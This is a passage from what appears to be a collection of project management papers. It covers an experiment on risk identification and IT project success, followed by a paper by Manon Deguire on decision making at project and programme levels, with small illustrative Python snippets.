5 Results from an Experiment
The conclusion that individual risk management activities contribute to project success is based upon the opinions
of individual stakeholders, meaning that the effect of risk
management on project success is directly attributable to
those effects as perceived by project stakeholders. Given
the case study research setting, the possibilities for “objective” validation of these perceptions are limited. In order to
create additional information on the effect of a specific risk
management practice on project success, independently of
various stakeholders’ perceptions, an experiment was developed with the aim of answering the following sub-question: Does the use of a specific risk management practice
influence objective project success and project success as
perceived by project members?
Building on the results of the case studies, risk identification was chosen as the risk management activity for the
experiment. Risk identification is the activity which, according to the results from the case studies, has the most impact
on project success. Furthermore, a project generally starts
with a risk identification session, which makes risk identification relatively easy to implement in an experimental setting. The experiment was conducted with 212 participants
in 53 project groups. All participants were members of a
project group where, in the project, each member had the
same role. The project team had a common goal, which further diminished the chances for strategic behaviour of participants. The common goal situation provided the conditions for open communication and therefore for communicative effects, generated by the risk management activity.
All project groups that performed risk identification before project execution used a risk prompt list to support the
risk identification process. 17 groups did risk identification
by discussing the risks with team members (type 3 groups);
18 groups that did risk identification did not discuss risks
with team members (type 2 groups). The control group
projects (type 1 groups, 18 groups) conducted no risk identification at all before project execution. All project groups
had to execute the same project, consisting of 20 tasks.
Results from the experiment demonstrate that project
groups that conducted risk identification plus discussion
perform significantly better in the number of correctly completed tasks than the control groups that did not conduct risk identification at all. The number of correctly performed tasks is, in this experiment, one of the indicators of objective project success. A trend test2 demonstrates a highly significant result, indicating that the number of correctly performed tasks increases when groups perform risk identification, and increases further when groups do risk identification plus discussion. Figure 4 illustrates this trend: the types of projects are on the X-axis, and the Y-axis presents the average number of correctly performed tasks by the project team (Q3).

Figure 4: Trend Line, demonstrating the Influence of Risk Identification (RI) with or without Group Discussion on the Number of correctly Performed Tasks.

2 Jonckheere-Terpstra test: J = 625, r = .36, p < .01, N = 53.
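The trend test referred to above is the Jonckheere-Terpstra test (footnote 2). Its statistic can be computed directly by counting, over every ordered pair of group types, how many observation pairs fall in the ‘expected’ direction. The sketch below implements this count by hand on purely hypothetical task scores, since the grouped data from the experiment are not reproduced here.

```python
def jonckheere_terpstra(groups):
    """J statistic for an ordered alternative: for every pair of groups
    (i, j) with i < j, count the observation pairs (x from group i,
    y from group j) with x < y; ties count as one half."""
    j_stat = 0.0
    for i in range(len(groups)):
        for j in range(i + 1, len(groups)):
            for x in groups[i]:
                for y in groups[j]:
                    if x < y:
                        j_stat += 1.0
                    elif x == y:
                        j_stat += 0.5
    return j_stat

# Hypothetical numbers of correctly performed tasks for the three ordered
# group types: no risk identification, RI without discussion, RI plus discussion.
type1 = [11, 12, 13, 12, 14]
type2 = [13, 14, 14, 15, 13]
type3 = [15, 16, 14, 17, 16]
print("J =", jonckheere_terpstra([type1, type2, type3]))
```

A larger J than expected under the null hypothesis of no ordering indicates the kind of monotone trend across group types that the experiment reports.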
Perceived (opinionated) project success was measured
by asking projects to grade the project result. The analysis
of grades demonstrates some remarkable research findings.
Project groups that did risk identification plus discussion
(type 3) score significantly better on the number of correctly
performed tasks than control groups (type 1). After project
groups have been informed about their own project result
(and their own result only), all project groups value their
project result equally. There is no difference in grades assigned by project groups from any of the group types. The
result of project groups that conducted risk identification
plus discussion is objectively better, but apparently this better result is not reflected in the opinion of the project groups
who conducted risk identification plus discussion.
It is remarkable to see that, directly after project execution, before project groups are informed about their project
result, project groups who conducted risk identification plus
discussion are significantly more positive about their result
than groups that conducted no risk identification or risk identification without communication. The grades for project
success given by project groups directly after project execution indicate that project groups attribute positive effects
to risk management in relation to project success.
6 Conclusions and Implications
The main conclusion of this research is: Project risk
management as described in handbooks for project management and project risk management [14][8] only occasionally contributes to project success if project risk management is considered solely in terms of instrumental action working on an instrumental object. If, on the other hand,
project risk management is considered a set of activities in
which actors interact and exchange information, also known
as communicative action, working on a social object, individual risk management activities contribute to project success because the activities may generate Action, Perception, Expectation and Relation effects. A positive relation
exists between the effects generated through risk management activities and project success.
The experiment demonstrates that an individual risk
management activity is able to contribute to elements of
project success. For this effect to occur, it is not necessary
to measure or to quantify the risk. For instance in a risk
identification brainstorm, project stakeholders exchange
information on what they individually see as the potential
dangers for the project. Such an exchange of information
may lead to adjustments of the expectations of individual
actors and the creation of mindfulness [15]. Mindfulness
includes awareness and attention; actors become sensitive
to what is happening around them, and they know when
and how to act in case of problems. This leads to a remarkable conclusion, which can be described as “the quantum
effect” of project risk management, because its appearance
is somewhat similar to what Werner Heisenberg in quantum mechanics described as the uncertainty principle.
Firstly, in order to influence the risk, it is not necessary
to measure the risk. The experiment demonstrated that a
risk prompt list, in which five risks were mentioned that
were realistic, but all of which had very low probability of
occurring, is enough to make project members aware of
potential project risks and to influence their behaviour. As
a result, the project groups who talked about the risks before project execution performed better and gave themselves
a higher grade for the performance of their project. Secondly, as a result of this communicative effect, it is impossible to measure risk without changing its probability. The
moment the risk is discussed, stakeholders become influenced and this consequently leads to an effect on the probability of the risk.
Based on the research findings the main implication or
recommendation for practitioners is to continue the use of
risk management on IT projects. However, this research
provides some important recommendations that should be
taken into account when risk management is used on IT
projects. Practitioners should be aware that the assumptions
underlying the project risk management process as described in handbooks for project management (the instrumental view) are often not correct. Hence, only in specific situations is the risk management process able to contribute to project success in terms of “on-time, on-budget”
delivery of a predefined IT system. If project risk management is used in a situation in which the assumptions are not
met, it will inevitably lead to a situation in which project
stakeholders think that the project risks are under control,
where in fact they are not.
However, individual risk management activities such as
risk identification or risk allocation generate non-instrumental effects, possibly in addition to instrumental effects. These
non-instrumental or communicative effects occur as a result of interaction (discussion, exchange of information)
between project stakeholders during the execution of risk
management activities. Communicative effects stimulate
instrumental action taking by stakeholders, and the effects
create a common view among project stakeholders about
the project situation by influencing stakeholders’ perceptions and expectations and shaping the inter-stakeholders’
relationships. Practitioners should be aware that the creation of communicative effects can be stimulated by providing capacity for interaction during risk management activities. For instance; a risk identification brainstorm session
or moderated meeting will generate more communicative
effects than a risk identification session in which only checklists or questionnaires are used. For the communicative effects to occur it is not necessary that the complete risk management process is executed as described in handbooks for
project management. Individual risk management activities
each have their own effect on project success through the
various communicative effects they may generate. The communicative effect contributes to project success, not only in
terms of time, budget and quality, but also in terms of perceived success.
At the same time, practitioners should be aware that communicative effects with an effect on project success will not occur in every project situation, nor is the effect, in all situations, a positive one. If, for instance during risk
identification, certain information about risks is labelled as
being important for the project, where in fact these risks
were relevant in an earlier project, but not in the forthcoming project, the risk communication can lead project members to focus upon (what later will appear to be) the “wrong
risks”. By focussing upon the wrong risks, project members are unable to detect and respond to risks that have not
been identified; one of the cases (case 7) of this research
provides an example of this type of problem. Furthermore,
communicative effects with a positive effect on project success occur predominantly in situations where information
is not used strategically. In situations in which information
on risks is not shared openly, the positive communicative
effect may not occur. One other case (case 4) of this research provides some indications that not sharing risk related information between customer and IT supplier leads
to lower communicative effects, resulting in lower project
success.
References
[1] K. de Bakker. Dialogue on Risk – Effects of Project
Risk Management on Project Success (diss.).
Groningen, the Netherlands: University of Groningen.
Download at: <http://www.debee.nl>, 2011.
[2] The Standish Group International. Chaos: A Recipe for Success, 1999. Retrieved from <http://www.standishgroup.com/sample_research/index.php>, (21.06.07).
[3] Royal Academy of Engineering. The Challenges of Complex IT Projects, 2004. Retrieved from <http://www.raeng.org.uk/news/publications/list>, (19.06.07).
[4] M.T. Pich, C.H. Loch, A. de Meyer. On Uncertainty,
Ambiguity and Complexity in Project Management.
Management Science 48(8), 1008–1023, 2002.
[5] E. Kutsch, M. Hall. Intervening conditions on the management of project risk: Dealing with uncertainty in
information technology projects. International Journal
of Project Management 23(8), 591–599, 2005.
[6] B. Flyvbjerg, N. Bruzelius, W. Rothengatter. Megaprojects
and Risk – An Anatomy of Ambition. Cambridge, UK:
Cambridge University Press, 2003.
[7] C. Besner, B. Hobbs. The perceived value and potential contribution of project management practices to
project success. Project Management Journal 37(3),
37–48, 2006.
[8] Project Management Institute. A guide to the project management body of knowledge (PMBOK®). Newtown
Square, PA: Author, 2008.
[9] R.J. Voetsch, D.F. Cioffi, F.T. Anbari. Project risk management practices and their association with reported
project success. In: Proceedings of 6th IRNOP Project
Research Conference, Turku, Finland, August 25-27,
2004.
[10] Office of Government Commerce. Managing Successful Projects with PRINCE2. Norwich, UK: The Stationery Office, 2009.
[11] T. Williams. Assessing and moving on from the dominant project management discourse in the light of
project overruns. IEEE Transactions on Engineering
Management 52(4), 497-508, 2005.
[12] N. Agarwal, U. Rathod. Defining “success” for software projects: An exploratory revelation. International
Journal of Project Management 24(4), 358–370, 2006.
[13] J. Habermas. The Theory of Communicative Action –
Reason and the Rationalization of Society. Boston, MA:
Beacon Press, 1984.
[14] Association for Project Management (APM). Project
Risk Analysis and Management Guide. Buckinghamshire, UK: Author, 2004.
[15] K.E. Weick, K.M. Sutcliffe. Managing the Unexpected.
New York, NY: Wiley, 2007.
Decision-Making:
A Dialogue between Project and Programme Environments
Manon Deguire
This paper proposes to revisit and examine the underlying thought processes which have led to our present state of DM
knowledge at project and programme levels. The paper presents an overview of the Decision Making literature, together with observations and comments from practitioners, and proposes a DM framework which may empower project and programme managers in the future.
Author

Manon Deguire is a Managing Partner and founder of Valense Ltd., a PMI Global Registered Education Provider, which offers consultancy, training and research services in value, project, programme, portfolio and governance management. She has 25 years’ work experience in the field of Clinical and Organizational Psychology in Canada, the USA, the UK and Europe and has extensive experience in teaching, as well as in project and programme management. From 1988 to 1996 Manon held a full-time academic post at McGill University (Montreal) which included both teaching at graduate and undergraduate levels as well as being the Programme Manager for the Clinical Training Program (P&OT), Faculty of Medicine. Her responsibilities involved heading and monitoring all professional development projects as well as accreditation processes for more than 120 ‘McGill Affiliated’ hospital departments. Although Manon relocated to London in 1996, her more recent North American experience includes being actively involved in PMI® activities. More specifically, she was Director-at-Large of Professional Development for the Education Special Interest Group from 2004 to 2006 and has been a member of the Registered Educational Providers Advisory Group since 2005. Her responsibilities in this role involve presenting and facilitating activities for REPAG events worldwide. She is also a regular speaker at PMI® Congresses in the US and abroad, as well as PMI® Research Conferences and PMI® Chapter events. More recently she has initiated a working relationship with the Griffin Tate Group in the US and completed their ‘train the trainer’ course. She is an Adjunct Professor with the Lille Graduate School of Management and conducts research on Decision-Making in project and programme environments. Her ongoing involvement in academia and her experience as a practitioner with multinational organizations and multicultural groups gives her a unique understanding of both the theory and practice of project-based organizations in general and project management in particular. She regularly teaches both PMP® and CAPM® Certification courses. Manon is currently finishing a PhD in Projects, Programs and Strategy at the ESC Lille School of Management (France); she holds a Masters degree in Clinical Psychology from the University of Montreal (CA) and a Masters degree in Organizational Psychology from Birkbeck College in London (UK). She is a certified PMP® and also holds both Prince2 Practitioner and MSP Advanced Practitioner certifications (UK). <[email protected]>

1 Decision Making
"Decision-making is considered to be the most crucial
part of managerial work and organizational functioning."
Mintzberg in [2 p.829]
According to some definitions, a decision is an allocation of resources. For others, it can be likened to writing a
cheque and delivering it to the payee. It is irrevocable, except that a new decision may reverse it. Similarly, the decision maker who has authority over the resources being allocated makes a decision. Presumably, he/she makes the
decision in order to further some objective, which he/she
hopes to achieve by allocating the resources [1].
Different definitions of what a decision is and involves
abound in literature that spreads through the knowledge of
many centuries of all disciplines [2]. Decision Making (DM)
is very important to most companies, and modern organizational definitions can be traced back to von Neumann and Morgenstern in 1947 [3], who developed a normative decision theory from the mathematical elaboration of the utility
theory applied to economic DM. Their approach was deeply
rooted in sixteenth century probability theory, has persisted
until today and can be found relatively intact in present decision analysis models such as those defined under the linear decision processes. This well-known approach uses
probability theory to structure and quantify the process of
making choices among alternatives. Issues are structured
and decomposed into small decisional levels, and re-aggregated with the underlying assumption that many good small
decisions will lead to a good big decision. Analysis involves
putting each fact in consequent order and deciding on its
respective weight and importance.
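As a minimal illustration of this normative, utility-based style of analysis, the sketch below scores two alternatives by probability-weighted utility; the alternatives, probabilities and utilities are entirely hypothetical and are only meant to show the decomposition-and-reaggregation logic described above.

```python
# Each alternative is decomposed into outcomes with (probability, utility);
# the 'good big decision' is assumed to be the alternative with the highest
# expected (probability-weighted) utility.
alternatives = {
    "deliver in-house": {"success": (0.6, 100), "failure": (0.4, -40)},
    "outsource":        {"success": (0.8, 70),  "failure": (0.2, -20)},
}

def expected_utility(outcomes):
    return sum(p * u for p, u in outcomes.values())

best = max(alternatives, key=lambda name: expected_utility(alternatives[name]))
for name, outcomes in alternatives.items():
    print(f"{name}: expected utility = {expected_utility(outcomes):.1f}")
print("Choose:", best)
```

The qualitative and behavioural critiques discussed in the rest of this paper are directed precisely at the limits of this kind of calculation.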
Although most descriptive research in the area of DM
concludes that humans tend to use both an automatic nonconscious thought process as well as a more controlled one
when making decisions [4], the more controlled approach
to DM remains the most important trend in both theoretical
and practical models of DM. However, this dual thought
process is possible because of the human mind’s capability
to create patterns from facts and experiences, store them in
the registers of long-term memory and re-access them in
the course of assessing and choosing options. Many authors
refer to this mechanism as "intuitive DM", a term that has
not gained much credibility in the business environment and
is still looked down upon by many decision analysts.
Given the years during which modern Project Management was developed (as well as other management trends),
it is not surprising to find that the more controlled, linear
mechanistic approach to DM permeates its literature, and that the project context seems to have neglected the importance of the softer and/or more qualitative aspects of the management domain that are now being recognized as essential for good business to develop. Therefore, in the new context of
projects and programmes, quantitative aspects of the DM
process are progressively becoming secondary issues to such
qualitative issues as the meaningfulness of a decision for
different stakeholders and for the overall organization.
Project managers are repetitively expected to listen to
different stakeholders’ needs and account for the numerous
qualitative and quantitative variables when making decisions; however, both information overload and organizational constraints usually make this difficult to implement
and very little guidance can be found in the project literature. If anything, the overwhelming importance of the DM
issue seems rather accepted as common knowledge for
project managers as it is not mentioned or explored in the
PMBOK® Guide [5] or in other popular project approaches
despite the bulk of recent research and growing interest in
this domain. In spite of the increasing importance placed on
DM knowledge and skills, many project and programme
managers continue to struggle with the concept, which can stand
in the way of career progression and may be one of the primary factors preventing project and programme success.
Project management practice is permeated with the
thought that in order to facilitate DM in the project context,
simple (linear) evaluation tools should be widely used. However, it has now long been documented that these decision-support tools are no longer sufficient when project managers’ roles have grown to accommodate the ever-changing
complexity of the business environment. This situation has
added considerably to the number of variables and the dimensions of an already complex web of relationships brought
about by the stakeholder focus. With such changes as the
implementation of Project Management Offices, Portfolio
Management, Program Management and Project-Based Or-
ganizations, project managers are now called upon to interact with an ever-expanding pool of stakeholders, using other tools, such as meetings, reports and electronic networks, which are also important. Intuition, judgment and vision
have become essential for successful strategic project and
programme management.
Without an appropriate framework, some authors have
suggested that managers do not characteristically solve
problems but only apply rules and copy solutions from others [6]. Managers do not seem to use new decision-support
tools that address potential all-encompassing sector-based
elements, such as flexibility, organizational impact, communication and adaptability, nor technological and employee developments. There is therefore a potential for
managerial application of new, value creation decision-support tools. Because these are not mature tools, in the first
instance they might be introduced in a more qualitative way
– ‘a way of thinking’, as suggested in [7], to reduce the
managerial skepticism. Recent decision-support tools might
be fruitfully combined with traditional tools to address critical elements and systematize strategic project management.
It is now a well-accepted fact that traditional problem-solving techniques are no longer sufficient as they lead to
restrictive, linear Cartesian conclusions on which decisions
were usually based in the past. Instead, practitioners need
to be able to construct and reconstruct the body of knowledge according to the demands and needs of their ongoing
practice [8]. Reflecting, questioning and creating processes
must gain formal status in the workplace [9].
In [10] it is implied that management is a series of DM
processes and it is asserted that DM is at the heart of executive
activity in business. In the new business world, decisions
need to be made fast and most often will need to evolve in
time. However, most of the research is based on a traditional linear understanding of the DM process. In this linear model, predictions are made about a known future and
decisions are made at the start of a project, taking for
granted that the future will remain an extension of the past.
2 DM at Project Level
The commonly accepted definition of a project as a
unique interrelated set of tasks with a beginning, an end
and a well defined outcome [5] assumes that everyone can
identify the tasks at the outset, provide contingency alternatives, and maintain a consistent project vision throughout the course of the project [11]. The ‘performance paradigm’ [12][13] used to guide project management holds true
only under stable conditions or in a time-limited, change-limited context [14][15]. This is acceptable as long as, by
definition, the project is a time-limited activity, and for the
sake of theoretical integrity, is restricted to "the foreseeable future."
The traditional DM model has provided project managers with a logical step-by-step sequence for making a decision. This is typical of models proposed in the decision-making literature of corporate planning and management
science of the past. It describes how decisions should be
made, rather than how they are made. The ability of this
process to deliver best decisions rests upon the activities
that make up the process and the order in which they are
attended to. In this framework, the process of defining a
problem is similar to making a medical diagnosis, the performance gap becomes a symptom of problems in the organization’s health and identification of the problem is followed by a search for alternative solutions. The purpose of
this phase of the decision-making process is to seek the best
solution [16, Ch. 1]. Several authors have identified a basic
structure, or shared logic, underlying how organizations and
decision-makers handle decisions. Three main decision-making phases can be defined: Identification, by which situations that require a decision-making response come to be
recognized, Development involving two basic routines (a
search routine for locating ready-made solutions and a design routine to modify or develop custom-made solutions) and Selection with its three routines (screening, evaluation-choice and authorization) [17].
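Purely as an illustration (not part of the original study), this phase-and-routine structure can be sketched as a small data model that records how a single decision moves from Identification through Development to Selection. The phase and routine names follow [17]; the class and the sample situation are assumptions made for the example.

```python
# Illustrative sketch only: phases and routines follow Mintzberg et al. [17];
# the class and the sample situation are invented for the example.
from dataclasses import dataclass, field

PHASES = {
    "Identification": ["recognition"],                      # the situation comes to be recognized
    "Development": ["search", "design"],                     # ready-made vs. custom-made solutions
    "Selection": ["screening", "evaluation-choice", "authorization"],
}

@dataclass
class Decision:
    situation: str
    phase: str = "Identification"
    trail: list = field(default_factory=list)                # routines applied so far

    def apply(self, routine: str) -> None:
        """Record a routine, checking that it belongs to the current phase."""
        if routine not in PHASES[self.phase]:
            raise ValueError(f"{routine!r} is not a routine of the {self.phase} phase")
        self.trail.append((self.phase, routine))

    def advance(self) -> None:
        """Move to the next phase: Identification -> Development -> Selection."""
        order = list(PHASES)
        self.phase = order[order.index(self.phase) + 1]

d = Decision("performance gap detected in a programme")
d.apply("recognition"); d.advance()
d.apply("search"); d.apply("design"); d.advance()
d.apply("screening"); d.apply("evaluation-choice"); d.apply("authorization")
print(d.trail)
```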
3 DM at Programme Level
More recently, many organizations have felt a need to
further develop towards a fully projectised structure, which
goes beyond a simple portfolio approach and involves the
management of strategic decisions through programmes
[18][19]. This move has somewhat shifted the responsibilities and decision-making roles of project and programme
managers. At this level, several projects need to be managed together in order to create synergies and deliver benefits to the organization rather than delivering a specific
product or service in isolation and in most organizations
programme managers are actively working within a paradox. They have an official role in a legitimate control system (project level), facilitating an integrated transactional
change process, and simultaneously participate in a shadow
system in which no one is in control [20].
A mechanistic style of management warranting a more
rational and linear approach to DM is appropriate when goals
are clear and little uncertainty exists in the prevailing environment [11][21]. programme management practice is not
meant to replace this management focus; rather, it encompasses it in a larger context. Here, managers cannot control
their organization to the degree that the mechanistic perspective implies, but they can see the direction of its evolution [22]. When several variables are added to a system or
when the environment is changed, the relationships quickly
lose any resemblance to linearity [23]. This has been raised
by many authors in reference to strategic issues such as the
organization’s competitive position, the achievement of the
programme’s benefits and the effects of changes on the programme business case [24][25]. These same issues have traditionally been processed through a project view of change
control rather than a strategic view of change management
with one of the main drawbacks being that these standard
approaches focus on a linear programme lifecycle [26][27].
According to these authors, focus on early definition and
control of scope severely restricts flexibility thus negating
the value of having a programme. Furthermore, insistence
on a rigid life cycle intrinsically limits the ability of the
programme to adapt in response to evolving business strategy [26].
When studying the implementation of strategic projects,
Grundy [25] found that cognitive, emotional and territorial
themes were so intrinsically interwoven into the decision-making process that he suggested using the concept of "muddling through" originally introduced by Lindblom in 1959
[28]. Similarly unsatisfied with the rational model of decision-making at top management levels, Isenberg stated in
[29] that managers "rely heavily on a mix of intuition and
disciplined analysis" and "might improve their thinking by
combining rational analysis with intuition, imagination and
rules of thumb" (p.105).
Much of the literature concerning decision-making at
higher management levels seems to manifest perplexity and
more questions than answers. By increasing our knowledge
in this domain and providing an appropriate framework,
project and programme managers might find material to
reflect and possibly enhance their skills to better fit each
environment.
4 Discovering Project and Programme Level
Views
Beer [30] felt that most organizational research was irrelevant to practitioners because practitioners worked in a
world of chaos and complex systems, whereas research was
still about simple and equilibrated systems operated by researchers who maintain their objectivity. In order to respond
to such concerns, this research project was set in a participatory paradigm [31] and uses a mix of observation and
semi-structured interviews. The interview questions are
based on the theoretical framework that was developed from
the literature review and designed to capture the complex
web of thought processes leading to decisions. The main
objective was to uncover characteristics of linear and nonlinear decision situations at project and programme levels.
All respondents were either project or programme managers and had a good understanding of the differences between these roles and responsibilities.
Project managers typically described their working environment as consisting of "the team of people on the
project" and DM activities involved either these specific
people or the project specific tasks and goals. DM analysis
was often restricted to project level variables and remained
confined to the scope limits and constraints of the project.
On the other hand, as the following example clearly demonstrates,
one programme manager described her work environment
from an organizational point of view and her discourse was
not programme specific: "The programme manager has to
relate not only to the different projects involved in the programme, but also to the organization in terms of people (horizontal and vertical relationships) as well as the short, medium and long term strategy". This view was also coherent
with how project managers in our study perceive the programme managers’ roles and responsibilities.
Programme managers were described as seeing things
from above, implying that the thought processes used at their
level of analysis are different from those useful to oversee
one project. The general impression is one of managing many
ongoing concurrent decisions rather than a sequenced series of bounded decisions. A typical response from a project
manager describing the programme management role was:
"programme managers look down from above at different
projects and need to pace several projects and the resources
involved in groups of projects together." When describing
her own role, one programme manager states: "developing
strategic goals that are in line with the governance is really
important, that’s one part of the job. Then figuring out how
to deliver that strategy is the other part."
Project managers speak of themselves and are referred
to by programme managers as dealing with single projects
and having to make more sequenced isolated decisions (technical, human related…). Decisions at this level are referred
to as being more independent from one another and
sequenced in time. One decision is followed by resolution
until another decision has to be made. Each decision is more
discrete in nature (technical, human resource, procurement
related) whereas programme decisions are often interrelated,
covering many areas simultaneously.
One project manager described his work in the following way: "My projects have a beginning and an end. I am
involved mainly in engineering projects at the moment and
they have specific finish dates." A programme manager’s
descriptions of the project manager’s role was that "a project
manager deals more precisely with things like budgets and
constraints of the project that they are in charge of, they
seem to operate within specific parameters." The vocabulary used to describe decisions at the project level was generally more precise and specific.
Both project and programme managers feel that DM
activities occupy a major part of their day or time at work.
It was extremely difficult for both groups of respondents to
evaluate the number of decisions taken in the course of any
fixed period of time (day, month…). A typical response from
one project manager illustrates this when he says: "I would
say I can spend the better part of my nine hours at work
making decisions, from small ones like deciding to change
activity or big ones like for example a large screen project
[…] this could mean making hundreds of decisions per day."
Similarly, one programme manager states that "A great deal
of time is devoted to decision making activities at the beginning of the programme, perhaps 100% of my time gets
devoted to it at this phase as I am looking at things like
risks involved."
Although it was difficult for both project and programme
managers to quantify the time spent on DM activities or the
number of decisions involved in their work, their subjective evaluations all converged to say that they felt they spent
a great deal of time in DM activities.
Both groups also feel that in the initial phase of the
project or programme, they spend almost all their time
making and taking decisions. This was described as an acute
DM time. Later phase decisions seem to focus on more specific issues for project managers, either described as technical or human relation issues. Programme managers mention the technical issues sporadically and mainly in the context of understanding what is going on. But unlike project
managers, technical versus human resources is not one of
the important dichotomies in the themes of their DM discourse. When technical DM was discussed it was usually
in terms of grasping a better understanding of what people
actually did, the skills or appropriate environment to enhance their performance, but not to actually solve the technical problem at hand or to make any decision about it.
When questioned about the use of specific DM tools
one project manager spontaneously described the traditional
rational method of DM: "When the problem is purely a technical one, it is easy in a way because we have tools to measure what is going on like oscilloscopes and things. Even if
it looks like a complicated problem with thousands of cables, then we look at the symptoms and we come up with a
diagnosis often this is based just on our experience of similar problems [...] We have a discussion on how to go about
it, how to measure it, we cut the problem in half and we
again look at the symptoms. So, in a way, in the decision-making process we break down the problem into something
that we can observe or measure." This description could
have been taken from a number of DM texts that are concerned with the way decisions should be made. In fact, for
project managers, most purely technical decisions seem to
follow the traditional DM model, breaking down into more
manageable small decisions and exploring alternatives
against each other. However, even in this group, many state
that few decisions are purely technical and say that most
decisions involve a human component that varies in impor-
tance. The importance of this aspect ranges from at least
equal to outweighing the technical aspect. Together with
the traditional DM breakdown process, experience is usually mentioned as a key factor of the DM process.
Contrary to the discourse held by project managers, there
are no such straightforward textbook answers from programme managers. This could be simply symptomatic of
the sample; however, programme managers describe an iterative ongoing process of information gathering in order
to make sense of holistic situations. One programme manager saw herself as constantly gathering information in or-
der to organize it in a cohesive way. Talking about the programme she is presently involved in, she described the process in the following words: "It involves many different people at different levels and I need to set time aside to understand exactly what is going on. Then, I will need to get back
to them and formulate how it all fits in together, but I need
to give myself some time to get my head around it."

Figure 2: DM Model in Programmes.
5 Discussion
The data analysis shows that project managers seem to
have a natural predisposition toward using a more traditional and structured approach to DM. This observation can
be accounted for in more than one way and the research
method employed does not enable the establishment of
causal relationships. The difference could be caused by the
nature of their roles and responsibilities or that people who
have personal affinities for this type of DM approach tend
to be attracted to this type of work. Further psychological
testing would be necessary to establish this second type of
relationship. Nevertheless, project managers have described
logical step-by-step sequences that could actually have been
used as examples for the typical models proposed in the
DM literature such as those described in [16] and [17]. Although critics of this approach have outlined the fact that
the ability of this process to deliver best decisions rests upon
the activities that make up the process and the order in which
they are attended to, the project managers interviewed seem
comfortable with, and skilled at, using this method to resolve problems.
Within this DM model, project managers also tend to
use a process of deductive reasoning more often than programme managers, who have described processes of inductive reasoning as a preferential thought process when engaged in DM activities. Aristotle, Thales and Pythagoras
first described deductive reasoning around 600 to 300 B.C.
This is the type of reasoning that proceeds from general
principles or premises to derive particular information
(Merriam-Webster). It is characteristic of most linear DM
tools used in the context of high certainty. These tools are
aimed at achieving an optimal solution to a problem that
has been modeled with two essential requirements:
a) Each of the variables involved in the decision-making process behaves in a linear fashion and
b) The number of feasible solutions is limited by constraints on the solution.
These tools rely almost entirely on the logic and basic
underlying assumptions of statistical analysis, regression
analysis, past examples and the linear expectations and predictions they stimulate. A good example is the story of Aristotle, who is said to have told of how Thales used predictive logic to deduce, from accumulated historical data, that
the next season’s olive crop would be a very large one and
bought all the olive presses, making a fortune in the process. However, given that deductive reasoning is dependent
on its premises, a false premise can lead to a false result. In
the best circumstances, results from deductive reasoning
are typically qualified as non-false conclusions such as: "All
humans are mortal. Paul is a human ⇒ Paul is mortal".
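The two requirements above describe the familiar linear, constrained evaluation tools. As a hedged illustration, the sketch below scores a few hypothetical options with fixed linear weights and discards any option that violates a constraint; all option names, weights and limits are invented.

```python
# Illustrative sketch of a linear, constrained evaluation tool (requirements a) and b)
# above): every variable contributes linearly to the score, and the feasible set is
# limited by constraints. All option names, weights and limits are hypothetical.

options = {
    "option A": {"cost": 120, "delivery_weeks": 6,  "strategic_fit": 7},
    "option B": {"cost": 90,  "delivery_weeks": 10, "strategic_fit": 8},
    "option C": {"cost": 150, "delivery_weeks": 4,  "strategic_fit": 9},
}

weights = {"cost": -0.5, "delivery_weeks": -2.0, "strategic_fit": 10.0}  # linear preferences
limits = {"cost": 140, "delivery_weeks": 8}                              # constraints (upper bounds)

def feasible(values):
    return all(values[k] <= bound for k, bound in limits.items())

def score(values):
    return sum(weights[k] * v for k, v in values.items())

ranked = sorted((name for name, vals in options.items() if feasible(vals)),
                key=lambda name: score(options[name]), reverse=True)
print(ranked)  # feasible options, best linear score first
```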
From the project managers’ perspective, the project’s
basic assumptions and constraints are the starting premises
for all further decisional processes. In fact, these initial conditions of the project environment act as limits or boundaries, necessary for this type of DM process to be effective.
Project managers generally feel that most large decisions
are actually made during the first phases of the project, before and during the planning stage. Project management
typically delivers outputs in the form of products and services and most project decisions are made to commit to the
achievement of these specific outputs [32]. This perspective implies that a series of small decisions that amount to
the project plan, are made during the planning phase and
finally add up to what is referred to as a large decision: the
approved project plan. All these decisions, that shape the
project, are made at the onset of the project. All later decisions are considered less important, more specific, and
aimed at problem solving; often limited to one domain of
knowledge at a time (i.e. technical, human relations…).
Because most large decisions have been made at the onset,
once the scope is defined, it limits the number of possible
dependent variables in the DM process. The number of significant stakeholders involved is also limited and the overall situation is described as limited to the project’s immediate environment. Much of the DM follows a relatively traditional structured model to which the deductive thought
process seems to adapt readily. Figure 1 illustrates this DM
model for projects.

Figure 1: Decision-Making Model in Projects.
6 Programme Management Framework
A particularly interesting finding is the fact that deductive reasoning does not seem quite as popular or as universally called for in the DM processes of the programme managers we interviewed. However, the use of inductive reasoning seems more popular than for project managers. De-
ductive reasoning applies general principles to reach specific conclusions, whereas inductive reasoning examines
specific information, perhaps many pieces of specific information, to derive a general principle.
A well known example of this type of thought process is
found in the story of Isaac Newton. By observation and thinking about phenomena such as how apples fall and how the
planets move, he induced the theory of gravity. In much the
same way, programme managers relate stories about having
to collect information through observation, questions and
numerous exchanges in order to put the pieces together into
a cohesive story to manage the programme. The use of Analogy (plausible conclusion) is often apparent in the programme managers’ discourse. This process uses comparisons such as between the atom and the solar system and the
DM process is then based on the solutions of similar past
problems, intuition or what is often referred to as experience. Contrary to project management where most decisions
are taken to commit to the achievement of specific outputs,
programme management typically delivers outcomes in the
form of benefits and business case decisions are taken over
longer periods of time depending on the number of projects
that are progressively integrated to the programme and to
the timing scale of these different projects [32].
These decisions increasingly commit an organization to
the achievement of the outcomes or benefits and the DM
period, although important at the beginning, continues progressively as the situation evolves to accommodate the
changes in this larger environment. Typical responses from
programme managers tend to converge toward an ongoing
series of large decisions (affecting the totality of entire
projects) as the programme evolves over time. This can be
compared to the project level discourse that described large
decisions at the onset and smaller ones (not affecting the
overall business case of the project) as the project evolved.
This is in keeping with the fact that, since programmes deliver benefits as opposed to specific products or services,
the limits of the programme environment are not as specific
or as clearly defined as those for the project. Organizational
benefits are inherently linked to organizational strategy, value
systems, culture, vision and mission. This creates an unbounded environment and basic assumptions are not as clear
as for the project environment. This could account for the
fact that deductive thought processes are less suited than
inductive ones in the DM processes of programme managers.
7 Conclusion
Both project and programme managers were unanimous
in recognizing the importance and the amount of time spent
in decision-making activities and that further knowledge is
needed in this domain.
It would seem that a more mechanistic style of management warranting a more rational and linear approach to decision making is appropriate when goals are clear and little
uncertainty exists in the prevailing environment. The time-limited definition of projects makes them well adapted to
this performance paradigm.
These observations do not aim to lessen the requirements for traditional DM, but highlight the fact that programme management DM practice encompasses a larger
context. Here, managers cannot control their organizations
to the degree that the mechanistic perspective implies, but
have to develop an awareness of their future evolution. The
implications are readily felt at the decisional level; when
